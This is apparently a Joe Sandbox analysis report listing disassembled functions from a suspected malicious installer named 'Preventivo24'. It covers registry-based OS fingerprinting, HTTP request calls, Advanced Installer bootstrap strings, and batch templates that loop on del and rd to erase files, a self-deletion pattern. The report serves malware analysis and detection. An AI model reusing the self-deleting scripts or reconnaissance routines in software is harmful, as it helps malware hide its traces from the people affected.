Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExceptionFilterUnhandled__set_se_translator
String ID:
API String ID: 2480343447-0
Opcode ID: bc1e69381aa1c966bd901783944eb50f4fa275638fa4b82da091ef8b75aac2d9
Instruction ID: 68c40adabdc2a3895bd7fa031cd4adb9a77174c6be571ee6b580854d1614b588
Opcode Fuzzy Hash: bc1e69381aa1c966bd901783944eb50f4fa275638fa4b82da091ef8b75aac2d9
Instruction Fuzzy Hash: C7E0D876614200AFC6206366ED08F8ABF75BB95711F44002AF29153294C76058459BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0100AD30 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 79870ca2a7959b104a9ae3e5ab3443b4688318babcf8b09555fbc1bdcfe2c44b
Instruction ID: 7cb23aa28faae9399b5953ca54ac1802ad6e543f099d326da90832bf0011c117
Opcode Fuzzy Hash: 79870ca2a7959b104a9ae3e5ab3443b4688318babcf8b09555fbc1bdcfe2c44b
Instruction Fuzzy Hash: F2716CB0A0070ADFD749CF64C59439ABBE0BF04308F54816DD5589B782DB7AA91ACFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2FE0 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 223
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00FC305A
RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?,?), ref: 00FC308F
RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 00FC310E
RegCloseKey.KERNEL32(00000000), ref: 00FC32EE

Strings

Enterprise, xrefs: 00FC3169
EmbeddedNT, xrefs: 00FC31E6
Blade, xrefs: 00FC3230
Small Business, xrefs: 00FC3150
DataCenter, xrefs: 00FC31FF
Embedded(Restricted), xrefs: 00FC3247
BackOffice, xrefs: 00FC3182
Small Business(Restricted), xrefs: 00FC31CD
Storage Server, xrefs: 00FC3275
ProductSuite, xrefs: 00FC3103
WinNT, xrefs: 00FC3099
SYSTEM\CurrentControlSet\Control\ProductOptions, xrefs: 00FC3050
ProductType, xrefs: 00FC3084
ServerNT, xrefs: 00FC30BC
Terminal Server, xrefs: 00FC31B4
Compute Server, xrefs: 00FC328C
CommunicationServer, xrefs: 00FC319B
Personal, xrefs: 00FC3219
Security Appliance, xrefs: 00FC325E

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
API String ID: 1586453840-3149529848
Opcode ID: 26be81554e82f3dff2b45e535bc308405132d2c3a824a2f8f04c6d67566e01e5
Instruction ID: 56726a718415ad73c78e36c6bcb9587bacb87abb435d4ec3893f323c37c5b357
Opcode Fuzzy Hash: 26be81554e82f3dff2b45e535bc308405132d2c3a824a2f8f04c6d67566e01e5
Instruction Fuzzy Hash: FB71B231B0030ADBDF64AA25DF42FAA72A5BB403D4F10807DD926A7681EB38CE45A741

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2C30 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 227
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00FC2CA8
RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00FC2CE9
RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00FC2D0C
RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00FC2D3F
RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00FC2DB8
RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00FC2E2F
RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00FC2E85
GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00FC2F23
GetProcAddress.KERNEL32(00000000), ref: 00FC2F2A
GetCurrentProcess.KERNEL32(?), ref: 00FC2F61
IsWow64Process.KERNEL32 ref: 00FC2F70
RegCloseKey.ADVAPI32(00000000), ref: 00FC2FAA

Strings

CSDVersion, xrefs: 00FC2E7A
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00FC2C9E
CurrentBuildNumber, xrefs: 00FC2DAD
CurrentMajorVersionNumber, xrefs: 00FC2CDE
kernel32, xrefs: 00FC2F1E
IsWow64Process, xrefs: 00FC2F19
CurrentVersion, xrefs: 00FC2D34
CurrentMinorVersionNumber, xrefs: 00FC2D01
ReleaseId, xrefs: 00FC2E24

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
API String ID: 2654979339-3583743485
Opcode ID: fabff17dcac0373b732919a1f839684266d20d0dcffcd6f87ad7145d0496a820
Instruction ID: 6a11316bae1993b5baecb73a0714c0875e803a5a7a9be59e472fb03cae6363ed
Opcode Fuzzy Hash: fabff17dcac0373b732919a1f839684266d20d0dcffcd6f87ad7145d0496a820
Instruction Fuzzy Hash: B0A1AEB1901719DFDBB4CF20DD05FA9BBB6FB44721F0002AAE819A7280DB755A94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00FFBB40 Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 516
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FFC950: ResetEvent.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC963
Part of subcall function 00FFC950: InternetConnectW.WININET(00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92), ref: 00FFC986
Part of subcall function 00FFC950: GetLastError.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC990
Part of subcall function 00FFC950: WaitForSingleObject.KERNEL32(?,0000000A,?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983), ref: 00FFC9CA

ResetEvent.KERNEL32(?,?,?,?,?,?,00000003,00000000,B5580983), ref: 00FFBC1B
HttpOpenRequestW.WININET(?,?,?,HTTP/1.0,01142730,0115F120,?,?), ref: 00FFBC3E

Strings

HTTP/1.0, xrefs: 00FFBC34

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: EventReset$ConnectErrorHttpInternetLastObjectOpenRequestSingleWait
String ID: HTTP/1.0
API String ID: 3963449110-401229808
Opcode ID: 5007dd8110c050689d11a1a6ca1f8c8faf90039a253411fc8747718c0310ee80
Instruction ID: c0b42f10053c76f6b0415a83a73fd89abda6af0e8de58e28949839a6de8132b1
Opcode Fuzzy Hash: 5007dd8110c050689d11a1a6ca1f8c8faf90039a253411fc8747718c0310ee80
Instruction Fuzzy Hash: 7E326470D0022DDFDB25CFA8CA48BAEBBF5BF08314F144169E915A72A1DB34A945DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2870 Relevance: 31.9, APIs: 8, Strings: 10, Instructions: 355
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

GetModuleFileNameW.KERNEL32(00000000,?,00000104,B5580983,00000000,?,?,?,000000FF), ref: 00FA29A5
GetModuleHandleW.KERNEL32(kernel32,.local,?,?,?,?,000000FF), ref: 00FA2A4C
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00FA2A8B
SetSearchPathMode.KERNEL32 ref: 00FA2ABE
GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 00FA2AED
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FA2B4F
SetDefaultDllDirectories.KERNELBASE ref: 00FA2B82

Part of subcall function 00F773D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F77412

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

FreeLibrary.KERNEL32(?,B5580983,00000000,010B1B00,000000FF,?,000000E1,80004005,?,?,000000FF), ref: 00FA2DF4

Part of subcall function 00FA84F0: EnterCriticalSection.KERNEL32(011D001C,B5580983), ref: 00FA852F
Part of subcall function 00FA84F0: DestroyWindow.USER32(00000000), ref: 00FA854D
Part of subcall function 00FA84F0: LeaveCriticalSection.KERNEL32(011D001C), ref: 00FA8596

Strings

kernel32, xrefs: 00FA2A47
SetDefaultDllDirectories, xrefs: 00FA2B49
kernel32.dll, xrefs: 00FA2C67
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00FA28F4
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00FA2912
SetDllDirectory, xrefs: 00FA2AE7
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00FA2917, 00FA291F
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00FA28F9, 00FA2901
SetSearchPathMode, xrefs: 00FA2A85
.local, xrefs: 00FA2A26

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressProc$CriticalHeapModuleSection$AllocateDefaultDestroyDirectoriesDirectoryEnterFileFreeHandleLeaveLibraryModeNamePathProcessSearchSystemWindow
String ID: .local$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
API String ID: 863123761-2126665378
Opcode ID: 030e34a89c0eaf35da85feead7d10443c4c1221d5700f0b08e2ecff5af7aa154
Instruction ID: b3f3df500ef9df762ef723b0e6e1af66a183e4b01915473a354755a34e500fc0
Opcode Fuzzy Hash: 030e34a89c0eaf35da85feead7d10443c4c1221d5700f0b08e2ecff5af7aa154
Instruction Fuzzy Hash: 1BE18CB0901248DFCBA8DF59DA49BEE7BB5FB45318F108119EC29AB381D7745A08CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FDAF70 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00FDB056
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00FDB08A

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

Strings

Code returned to Windows by setup:, xrefs: 00FDBB17
Language selected programatically for UI:, xrefs: 00FDC047
Software\Caphyon\Advanced Installer\, xrefs: 00FDBEE0
Language of a related product is:, xrefs: 00FDBF70
A valid language was received from commnad line. This is:, xrefs: 00FDBD1D
Languages of setup:, xrefs: 00FDCD6A
%hu, xrefs: 00FDBD57
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 00FDBEF4
AI_BOOTSTRAPPERLANGS, xrefs: 00FDCA8F, 00FDCAA1, 00FDCAAB
Language used for UI:, xrefs: 00FDC0DE
Advinst_Extract_, xrefs: 00FDAFED, 00FDB002, 00FDB00C

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$FindHeapProcessResource
String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\
API String ID: 2083075878-297406034
Opcode ID: e47e021cab78f09f8bb2028fe071e76ea4fb5135416ca3a39dc665a746bef211
Instruction ID: 10748539cf9bd2e3a2ea7d50efc66bf858244cebf50c5ae4aee3c3132f0c0e4c
Opcode Fuzzy Hash: e47e021cab78f09f8bb2028fe071e76ea4fb5135416ca3a39dc665a746bef211
Instruction Fuzzy Hash: FEE1AE71900618DBDB25DF28CC55BAEB7B5EF48320F184299E869A73D1DB34AE41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FDABB0 Relevance: 23.9, APIs: 10, Strings: 3, Instructions: 1176threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00FDADC4
SetLastError.KERNEL32(0000000E), ref: 00FDADE1
GetCurrentThreadId.KERNEL32 ref: 00FDADF9
EnterCriticalSection.KERNEL32(011D536C), ref: 00FDAE16
LeaveCriticalSection.KERNEL32(011D536C), ref: 00FDAE39
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00FDB056
SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00FDB2E3

Part of subcall function 01003BE0: CloseHandle.KERNEL32(?,B5580983,?,00000010,?,00000000,01103163,000000FF,?,00FDF542,00000000,00000000,00000000,00000001,?,0000000D), ref: 01003C1A

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00FDB08A

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A

DialogBoxParamW.USER32(000007D0,00000000,00F05290,00000000), ref: 00FDAE56

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Strings

Code returned to Windows by setup:, xrefs: 00FDBB17
FILES.7z, xrefs: 00FDB5DF
Advinst_Extract_, xrefs: 00FDAFED, 00FDB002, 00FDB00C

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$CriticalHeapSection$ActiveAllocateCloseCurrentDialogEnterErrorEventFindHandleLastLeaveParamProcessResourceThreadWindow
String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z
API String ID: 1122345507-2771609608
Opcode ID: 8606b9da175b241f620b3e96fae8bc0278912ae5c1653f0fc72d61572e32d574
Instruction ID: 46b911f151a7902f0f783489240922bb65ba189595057c594bcae5a5d0367d0b
Opcode Fuzzy Hash: 8606b9da175b241f620b3e96fae8bc0278912ae5c1653f0fc72d61572e32d574
Instruction Fuzzy Hash: 3CA2BC31D00248CFDB15DF68C855BEEBBB5AF48320F18819AE519AB391DB34AE45DF90

Uniqueness

Uniqueness Score: -1.00%

Function 010034D0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 371
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

SetWindowTextW.USER32(00000000,?), ref: 01003746
GetDlgItem.USER32(00000000,000007D1), ref: 0100375D
SendMessageW.USER32(00000000,000000D2,00000000,00000000), ref: 0100376F
GetDlgItem.USER32(00000000,000007D1), ref: 010037B8
GetDlgItem.USER32(00000000,0000042D), ref: 010037C8
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010037D8
SendMessageW.USER32(00000000,000000CC,?,00000000), ref: 010037F4
EndDialog.USER32(00000000,00000002), ref: 01003821
GetDlgItem.USER32(00000000,000007D1), ref: 01003853
EndDialog.USER32(00000000,00000001), ref: 010038E0

Strings

PackageCode, xrefs: 010035FA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Item$MessageSend$Dialog$HeapProcessTextWindow
String ID: PackageCode
API String ID: 374704001-1525858878
Opcode ID: 8b3136d41b43e2cc38054bc9dd3429aff0dba7a67cdd74f35ce82bc188a35c66
Instruction ID: ee5ac3681a968e0ed4e98ab6d9372f826703d65881ae8579e5b094f2e9ec41b5
Opcode Fuzzy Hash: 8b3136d41b43e2cc38054bc9dd3429aff0dba7a67cdd74f35ce82bc188a35c66
Instruction Fuzzy Hash: DAD12431A01606AFEB16DF68CC45B6EBBE1FF48310F004169F969AB3D1DB75A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB9C0 Relevance: 18.2, APIs: 12, Instructions: 190
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

